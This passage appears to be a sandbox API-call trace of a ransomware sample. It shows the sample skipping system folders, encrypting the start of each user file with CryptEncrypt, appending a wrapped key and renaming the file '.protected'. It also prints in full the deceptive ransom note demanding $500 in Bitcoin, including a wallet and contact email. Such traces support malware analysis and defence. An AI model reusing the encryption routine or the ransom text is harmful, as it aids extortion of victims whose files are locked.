cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png.protected") returned 105 [0091.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png.protected")) returned 1 [0091.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Windows") returned -1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Program Files") returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Program Files (x86)") returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="$Recycle.bin") returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="System Volume Information") returned 1 [0091.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrIW (lpFirst="vfsNT.jpg", lpSrch=".protected") returned 0x0 [0091.212] lstrcmpW (lpString1="vfsNT.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0091.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW (lpFirst="vfsNT.jpg", lpSrch=".txt") returned 0x0 [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW (lpFirst="vfsNT.jpg", lpSrch=".rar") returned 0x0 [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW (lpFirst="vfsNT.jpg", lpSrch=".zip") returned 0x0 [0091.212] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.213] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.213] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.213] CloseHandle (hObject=0x14c) returned 1 [0091.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg.protected") returned 104 [0091.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg.protected")) returned 1 [0091.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Windows") returned -1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Program Files") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Program Files (x86)") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="$Recycle.bin") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="System Volume Information") returned 1 [0091.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.214] StrStrIW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".protected") returned 0x0 [0091.214] lstrcmpW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".txt") returned 0x0 [0091.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".rar") returned 0x0 [0091.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".zip") returned 0x0 [0091.215] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.215] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.215] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.216] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.216] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.216] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.216] CloseHandle (hObject=0x14c) returned 1 [0091.216] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3.protected") returned 114 [0091.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3.protected")) returned 1 [0091.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.216] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Windows") returned 1 [0091.216] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Program Files") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Program Files (x86)") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="$Recycle.bin") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="System Volume Information") returned 1 [0091.217] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrIW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".protected") returned 0x0 [0091.217] lstrcmpW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0091.217] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.217] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".txt") returned 0x0 [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".rar") returned 0x0 [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".zip") returned 0x0 [0091.217] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.218] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.218] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.218] CloseHandle (hObject=0x14c) returned 1 [0091.218] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a.protected") returned 119 [0091.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a.protected")) returned 1 [0091.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0091.219] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0091.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\RESTORE_FILES.txt") returned 102 [0091.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.219] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.219] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0091.220] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.220] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0091.220] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.220] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0091.220] CloseHandle (hObject=0xd8) returned 1 [0091.220] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Windows") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Program Files") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Program Files (x86)") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="$Recycle.bin") returned 1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="System Volume Information") returned -1 [0091.220] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.220] StrStrIW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".protected") returned 0x0 [0091.220] lstrcmpW (lpString1="mvNfPYUkR6OLy.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".txt") returned 0x0 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".rar") returned 0x0 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".zip") returned 0x0 [0091.221] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.222] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.222] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.222] CloseHandle (hObject=0xd8) returned 1 [0091.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav.protected") returned 98 [0091.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 